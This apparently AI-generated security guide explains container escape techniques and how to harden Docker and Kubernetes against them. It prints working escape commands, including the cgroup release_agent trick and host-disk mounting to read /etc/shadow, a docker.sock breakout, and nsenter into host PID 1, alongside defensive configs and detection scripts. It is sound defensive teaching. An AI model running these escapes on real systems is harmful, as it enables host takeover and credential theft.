Skip to content
Unverified — AI-generated content. Help verify this page

Container Escape Techniques

Containers provide process isolation, not security isolation. They use Linux kernel features (namespaces, cgroups, capabilities) to create the illusion of a separate system, but they all share the same kernel. A container escape occurs when an attacker inside a container breaks out to the host system or to other containers, gaining access they should not have.

Understanding container escape techniques is essential for anyone deploying containers in production, because the default configuration of Docker and Kubernetes is not secure against a determined attacker.

Related: Dirty Pipe & Kernel Exploits | Cloud Misconfigurations | Security Overview


The Container Isolation Model

What Containers Actually Isolate

ResourceIsolated?MechanismEscape Risk
FilesystemPartiallyMount namespaces, overlay fsVolume mounts can expose host paths
Process treeYesPID namespaces--pid=host disables it
NetworkYesNetwork namespaces--network=host disables it
UsersPartiallyUser namespaces (if enabled)Root in container = root on host (by default)
KernelNoShared kernelAny kernel exploit = host compromise
HardwareNoDirect device access possible--privileged exposes everything

Escape 1: Privileged Mode

Running a container with --privileged disables almost all security features. The container process has full access to the host's devices, filesystems, and kernel interfaces.

bash
# DON'T: Running a privileged container
docker run --privileged -it ubuntu bash

The Escape

bash
# Inside a privileged container — escape to host filesystem

# Method 1: Mount the host filesystem
mkdir /mnt/host
mount /dev/sda1 /mnt/host
# Now /mnt/host contains the entire host filesystem
cat /mnt/host/etc/shadow             # Read host passwords
chroot /mnt/host                     # Full host access

# Method 2: Load a kernel module
insmod /path/to/malicious.ko
# The module runs in the host kernel — game over

# Method 3: Write to host cgroup release_agent
# (Classic cgroup v1 escape technique)
d=$(dirname $(ls -x /s*/fs/c*/*/r* | head -n1))
mkdir -p $d/escape
echo 1 > $d/escape/notify_on_release
host_path=$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)
echo "$host_path/cmd" > $d/release_agent
echo '#!/bin/sh' > /cmd
echo "cat /etc/shadow > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$" > $d/escape/cgroup.procs
# /output now contains the host's /etc/shadow

Never Use --privileged in Production

--privileged gives the container full root capabilities on the host. There is no isolation. Common cases where teams think they need --privileged:

  • Docker-in-Docker: Use rootless Docker or kaniko instead
  • Accessing devices: Use --device=/dev/specific-device instead
  • Network tools: Add specific capabilities with --cap-add=NET_ADMIN
  • Debugging: Use ephemeral debug containers, never privileged

Escape 2: Docker Socket Mounting

Mounting the Docker socket (/var/run/docker.sock) into a container gives that container full control of the Docker daemon — which is equivalent to root access on the host.

yaml
# DON'T: Common in CI/CD pipelines
services:
  ci-runner:
    image: gitlab-runner
    volumes:
      - /var/run/docker.sock:/var/run/docker.sock

The Escape

bash
# Inside a container with Docker socket mounted

# List all containers on the host
docker ps

# Start a new privileged container with host filesystem mounted
docker run -it --privileged --pid=host \
  -v /:/host ubuntu chroot /host bash

# You now have root access to the host
id   # uid=0(root) gid=0(root)

Alternatives to Docker Socket Mounting

NeedInsecure ApproachSecure Alternative
Build images in CIMount docker.sockUse kaniko, buildah, or buildkit (rootless)
Monitor containersMount docker.sockUse Docker API over TLS with client certs
Container managementMount docker.sockUse Kubernetes API with RBAC
Docker-in-DockerMount docker.sockUse rootless Docker, sysbox, or Podman

Escape 3: Host PID Namespace

When a container shares the host's PID namespace (--pid=host), processes inside the container can see and interact with all processes on the host.

bash
# DON'T: Sharing host PID namespace
docker run --pid=host -it ubuntu bash

# Inside the container:
# See all host processes
ps aux

# Read environment variables of host processes (may contain secrets)
cat /proc/1/environ | tr '\0' '\n'
# DB_PASSWORD=s3cr3t
# AWS_SECRET_ACCESS_KEY=AKIA...

# Attach to host processes
nsenter -t 1 -m -u -i -n -p -- /bin/bash
# Full host shell via PID 1's namespaces

Escape 4: Kernel Exploits from Within Containers

Since containers share the host kernel, any kernel vulnerability exploitable from user space can be used to escape the container. This is the hardest escape to prevent because it does not require any misconfiguration.

Notable kernel exploits used for container escapes:

CVENameYearTechnique
CVE-2022-0847Dirty Pipe2022Overwrite host files via pipe splice
CVE-2016-5195Dirty COW2016Race condition in COW pages
CVE-2022-0185-2022Heap overflow in legacy_parse_param
CVE-2021-31440-2021eBPF verifier bypass
CVE-2022-23222-2022eBPF type confusion

Escape 5: runc Vulnerabilities (CVE-2019-5736)

runc is the low-level container runtime used by Docker, containerd, and CRI-O. CVE-2019-5736 allowed a malicious container to overwrite the host's runc binary, which is executed as root whenever a new container is started.

How It Worked

The Supply Chain Angle

CVE-2019-5736 is particularly dangerous in CI/CD environments where untrusted container images are built or tested. A malicious Dockerfile could create an image that exploits this vulnerability when any administrator runs docker exec on it.


Defense: Hardening Container Deployments

1. Drop Capabilities

bash
# Drop ALL capabilities, add back only what is needed
docker run \
  --cap-drop=ALL \ 
  --cap-add=NET_BIND_SERVICE \         # Only if binding to ports < 1024
  --security-opt=no-new-privileges \   # Prevent privilege escalation
  myapp:latest

2. Read-Only Root Filesystem

bash
docker run \
  --read-only \ 
  --tmpfs /tmp:rw,noexec,nosuid \      # Writable /tmp without exec
  --tmpfs /var/run:rw,noexec,nosuid \
  myapp:latest

3. seccomp Profiles

json
{
  "defaultAction": "SCMP_ACT_ERRNO",
  "architectures": ["SCMP_ARCH_X86_64"],
  "syscalls": [
    {
      "names": [
        "read", "write", "open", "close", "stat", "fstat",
        "mmap", "mprotect", "munmap", "brk", "exit_group",
        "futex", "epoll_wait", "accept", "socket", "bind",
        "listen", "connect", "sendto", "recvfrom"
      ],
      "action": "SCMP_ACT_ALLOW"
    }
  ]
}
bash
docker run \
  --security-opt seccomp=custom-profile.json \
  myapp:latest

4. AppArmor / SELinux

bash
# AppArmor (Debian/Ubuntu)
docker run --security-opt apparmor=docker-custom myapp:latest

# SELinux (RHEL/CentOS/Fedora)
docker run --security-opt label=type:container_strict_t myapp:latest

5. User Namespace Remapping

json
// /etc/docker/daemon.json
{
  "userns-remap": "default"
}

This maps root (UID 0) inside the container to an unprivileged user on the host. Even if an attacker escapes the container as "root," they are an unprivileged user on the host.


Stronger Isolation Runtimes

When containers are not enough, use runtimes that provide VM-level or kernel-level isolation:

RuntimeIsolation LevelPerformance OverheadUse Case
runc (default)Namespaces/cgroupsMinimalTrusted workloads
gVisorUser-space kernel5-30%Untrusted code, FaaS
Kata ContainersLightweight VM10-20%Multi-tenant, compliance
FirecrackermicroVM5-15%AWS Lambda, serverless

Choosing the Right Isolation

  • Trusted code, single tenant: Standard containers with hardening (seccomp, AppArmor, no-new-privileges)
  • Untrusted code: gVisor or Firecracker — do not rely on kernel namespace isolation
  • Compliance requirements: Kata Containers provide VM-level isolation that auditors understand
  • Multi-tenant platforms: Firecracker microVMs (used by AWS Lambda and Fly.io)

Kubernetes-Specific Risks

Pod Security Standards

yaml
# PodSecurity admission controller — enforce restricted profile
apiVersion: v1
kind: Namespace
metadata:
  name: production
  labels:
    pod-security.kubernetes.io/enforce: restricted
    pod-security.kubernetes.io/enforce-version: latest
    pod-security.kubernetes.io/warn: restricted
    pod-security.kubernetes.io/audit: restricted

Dangerous Kubernetes Configurations

yaml
# DON'T: These configurations enable container escape

# Privileged pod
spec:
  containers:
    - name: app
      securityContext:
        privileged: true

# Host PID namespace
spec:
  hostPID: true

# Host network namespace
spec:
  hostNetwork: true

# Host path volume mount
spec:
  volumes:
    - name: host-root
      hostPath:
        path: /

# Docker socket mount
spec:
  volumes:
    - name: docker-sock
      hostPath:
        path: /var/run/docker.sock

Secure Pod Configuration

yaml
# DO: Hardened pod security context
apiVersion: v1
kind: Pod
metadata:
  name: secure-app
spec:
  securityContext:
    runAsNonRoot: true
    runAsUser: 10000
    fsGroup: 10000
    seccompProfile:
      type: RuntimeDefault
  containers:
    - name: app
      image: myapp:v1.2.3@sha256:abc123...       # Pin by digest
      securityContext:
        allowPrivilegeEscalation: false
        readOnlyRootFilesystem: true
        capabilities:
          drop: ["ALL"]                          
      resources:
        limits:
          cpu: "500m"
          memory: "256Mi"

Detection

bash
# Detect containers running as privileged
docker ps -q | xargs docker inspect --format \
  '{{​.Name}}: Privileged={{​.HostConfig.Privileged}}' | grep true

# Detect containers with docker.sock mounted
docker ps -q | xargs docker inspect --format \
  '{{​.Name}}: {{​range .Mounts}}{{​.Source}} {{​end}}' | grep docker.sock

# Detect containers with host PID namespace
docker ps -q | xargs docker inspect --format \
  '{{​.Name}}: PidMode={{​.HostConfig.PidMode}}' | grep host

# Kubernetes: find privileged pods
kubectl get pods -A -o json | jq -r \
  '.items[] | select(.spec.containers[].securityContext.privileged==true) |
   "\(.metadata.namespace)/\(.metadata.name)"'

Key Takeaways

LessonImplication
Containers are not security boundariesThey provide isolation, not containment — the shared kernel is the weak link
Default configurations are insecureDocker and Kubernetes defaults prioritize ease-of-use over security
Privileged mode = no containment--privileged removes all container security features
Docker socket = root accessMounting docker.sock is equivalent to giving the container root on the host
Kernel exploits bypass everythingNo amount of container hardening helps if the kernel has a vulnerability
Stronger runtimes existgVisor, Kata, Firecracker provide actual security isolation when needed

Further Reading

"What I cannot create, I do not understand." — Richard Feynman